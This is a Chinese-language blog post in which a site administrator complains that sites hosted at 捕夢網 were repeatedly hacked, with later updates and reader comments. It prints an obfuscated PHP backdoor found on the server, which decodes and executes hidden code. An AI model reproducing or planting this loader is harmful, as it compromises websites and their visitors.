我知道平台很舊,難道被入侵,捕夢網數位科技只能兩手一攤嗎?還是要我用VPS,問題是我用的就是很貴的VPS(雲端主機)了,還是被入侵,我實在沒有招了。才整個清完,沒有兩天又被入侵,我想我們自己還是自求多福吧。
<?php $sqxvbm = ‘cvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opB#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)df x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{dXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)f54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54″]); if ((s!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57%)euhA)3of>2bd%!<5h%/#0#/*#npd/##-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]2W%wN;#-Ez-1H*WCw*[!%rN}#Qw%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cqujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`A6~6<u%7>/7&6|7**111127-K4Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Q7R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#f368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381pjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x273qj%6<*Y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`ay_map(“zzuquwp”,str_split(“%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y2>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sut44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&g}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uof:opjudovg<~ x24<!%o^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)544 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opa 61 x31″)) or (strstr($uas,” x61 156 x64 162 xfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+so!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,z>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]8:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:5298judovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]opoV;hojepdoF.uofuopD#278]y3f]51L3]84]y31M64]284]364]6]234]342]58]24]31#-%tdz*Wsfuvs# x27rfs%6~6< x7fw6<*K)ftpmd]38y]47]67y]37]88y]27]28y]#/r%if((function_exists(” x6f 142 x5f 163 x74 141 x72 164″) && (!00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%5-t.98]K4]65]D8]86]y31]A x27pd%6<C x27pd%6|6.7eu{66~6)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<)sfebfI{*w%)kVx{**#k#)tutjyf`x:!>! x242178}527}88:}334}472 x2qpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osv!-#2#/#%#/#o]#/*)323zbe!-#jt0jg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:4<!%ff2!>!bssbz) x24]25 x24-gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<1:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bng(0); $udiftgb = implode(arr5f9#-!#f6c68399#-!#65egb2dc#*<!sfuv6f 151 x64″))) { $jfigqxz = ” x63 162 x65 141 x74 145 -}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h84]275]y83]273]y76]277#<!yfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBS4- x24<%j,,*!| x24- x24gvodujpo!)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.x5f 146 x75 156 x63 164 x69 157 x6e”; function zzuquwp($n){return chd_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b99386c6f+9f5d816:+946:ce;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,6hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hj%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#4b!>!%yy)#}#-# x24- x24-tusqpt)%z-#x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw5c2b%!>!2p%!*3>?*2b%)gpf{jtsbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV -#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!vt)fubmgoj{hA!osvufs!~<3,6~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< xtrstr($uas,” x6d 163 x69 145″)) or (strstr($uas,” x72 166 x3):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%ufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`o)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)f%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)u|ftmf!~<**9.-j%-bubE{h%)sutcTW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-# x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24- x2qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#UOSVUFS,6<*msv%7-MSV,6<*)ujojR dk!~!<**qp%!-uyfu%)3offttj x22)gj!|!*nbsbq%)323ldfi% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% )fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7ppde:4:|:**#ppde#)tutjyf`<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3)idubn`hfsq)!sp!*#ojneb#-*f%)sepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*l} x27;%!<*#}_;#)323ldfid>}&;bss!>!bssbz)#44ec:649#-!#:618dKc]55Ld]55#*<%bG9}:}.}*?]+^?]_ x5c}X x24<!%tmw!>!#]y4)% x24- x24y4 x24- x24]y8 x24- x24]26 x2tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+7<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdX%w:**<“)));$pxzyuhc = $jfigqxz(“”, $udiftgb); $pxzyuhc();}}:#* x24- x24!>! x24/%tjw/ x2XA6|7**197-2qj%7-K)udfoopi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epn^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>5fubmgoj{h1:|:*mmvo:>:iuhofm%:-5D6]281L1#/#M5]DgP5]D6#<%fdy>#]TW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!o!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x2]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]46BALS[” x61 156 x75 156 x61″]=1; $uas=strtolower($_SERVER[” x48 124 xD4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdr(ord($n)-1);} @error_reportiisset($GLOBALS[” x61 156 x75 156 x61″])))) { $GLO1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8 x24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ xx27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{6;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)u:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd1927STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSdjksresl’; $pppqetw=explode(chr((490-370)),substr($sqxvbm,(33457-27531),(193-159))); $gmcvgrd = $pppqetw[0]($pppqetw[(4-3)]); $olikwdf = $pppqetw[0]($pppqetw[(11-9)]); if (!function_exists(‘blgfsdkxki’)) { function blgfsdkxki($qaqrqptnon, $rqkgwpac,$dlllozm) { $gkvapugxk = NULL; for($xpluckee=0;$xpluckee<(sizeof($qaqrqptnon)/2);$xpluckee++) { $gkvapugxk .= substr($rqkgwpac, $qaqrqptnon[($xpluckee*2)],$qaqrqptnon[($xpluckee*2)+(4-3)]); } return $dlllozm(chr((44-35)),chr((279-187)),$gkvapugxk); }; } $umjyhmx = explode(chr((275-231)),’2010,61,5479,49,5337,68,369,61,3630,60,1490,47,2709,54,2972,68,5450,29,2645,29,1150,70,1098,52,3210,67,2179,30,4778,70,827,25,3807,39,706,51,1952,28,4935,25,234,70,1045,53,648,58,4155,70,5730,50,3564,66,99,70,2845,52,4073,31,3345,46,4266,45,5780,40,1314,54,2374,66,3755,52,1006,39,3912,28,3539,25,3277,33,5528,60,4646,69,2209,36,2558,50,1220,40,0,57,1777,44,3391,27,2929,43,484,32,304,65,4430,64,4715,63,4035,38,4400,30,1537,46,3074,24,1260,54,3040,34,3846,66,4126,29,4104,22,4225,41,1389,65,4494,29,5588,64,5878,48,5048,32,4311,25,1454,36,5820,58,3418,56,3168,42,893,62,1868,22,2313,30,169,65,3098,70,2440,29,4575,30,2820,25,2245,68,430,54,1980,30,2120,36,3690,65,4336,64,1368,21,2343,31,2530,28,3974,61,3310,35,4907,28,4605,41,2897,32,5652,25,5677,53,5234,51,852,41,4960,60,4523,30,2674,35,1583,61,621,27,5110,54,516,53,1712,65,2156,23,1890,21,1821,47,569,52,5080,30,5405,45,1644,68,4553,22,2763,57,2071,49,955,51,5285,52,1911,41,5164,70,2608,37,2469,61,5020,28,757,70,3940,34,57,42,3474,65,4848,59′); $lyxsjwqe = $gmcvgrd(“”,blgfsdkxki($umjyhmx,$sqxvbm,$olikwdf)); $gmcvgrd=$sqxvbm; $lyxsjwqe(“”); $lyxsjwqe=(386-265); $sqxvbm=$lyxsjwqe-1; ?>
不知道入侵的內容是什麼,可以的話,請解譯一下。
20161018 其實不是不能解決平台老舊有漏洞的問題,就是錢花下去,買WAF服務,如果這就是解決方案,補夢網也未免太好做了。
另外,除了Google Webmaster掃到的毒之外,還有一堆,當然,補夢網提供的只有Google的異常清單。
還有一些被隱藏的殖入點,仍然是存在的,何時會被再入侵,我不知道,只有一句話,靠運氣。
有沒有招呢?有,我已經用了,而且還用了好幾招,從內而外的處理。
記錄這篇,順便在明年續約時拿出來,已經說了,他們不行,就不要硬用同一家了,拜託啦~採購大人。
20161019 捕夢網工程人員的弱,真的是無法想像,更新檔案後,owner / group 為root,同事無法更新,跑來吵我。
寫信去請求協助,搞到還要打電來問我為什麼?還要我教你們嗎?昏倒,我還是洗洗睡好了。
20161024 先說,放在補夢網的2個站,兩個站都被入侵,還是不同的方式入侵,殖入的程式碼不同,花我自己的時間在做程式的修正,說正的,如果要花錢買WAF(web application firewall),還不如搬回家來自己管。虛擬機被打掛了,我又不會痛是唄?
隨機文章
- Ubuntu Apache2 使用 Curl (2013-01-18)
- 新的Line詐騙手法 (2015-03-19)
- 一路玩到掛 (2008-03-02)
- 這次PTT處理帳號 超狠 (2017-08-11)
- 主機搬回家囉! (2014-03-12)
有點扯耶…話說想問樓主,捕夢網的vps一顆cpu核心可以跑到GHz呢?想架openconnect連線用
阿,我看到了,好像只有1GHz,而且centos只有6……
他是VCPU,是的1GHZ,也就說是,拿到的不是實體效能
好想搬回到公司的環境中 一天到晚有入侵的問題,實在有夠煩的